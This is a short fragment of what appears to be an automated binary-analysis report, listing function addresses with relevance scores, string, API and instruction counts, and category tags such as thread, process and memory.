threadCOMMON

Function 00421B30 Relevance: 9.3, Strings: 7, Instructions: 527
COMMON

Function 0040C080 Relevance: 6.4, Strings: 5, Instructions: 104
COMMON

Function 00418BA2 Relevance: 5.4, Strings: 4, Instructions: 367
COMMON

Function 00422370 Relevance: 4.2, Strings: 3, Instructions: 457
COMMON

Function 005107A6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 00415D89 Relevance: 1.6, APIs: 1, Instructions: 141
COMMON

Function 0210003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 004423C5 Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Function 02100E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON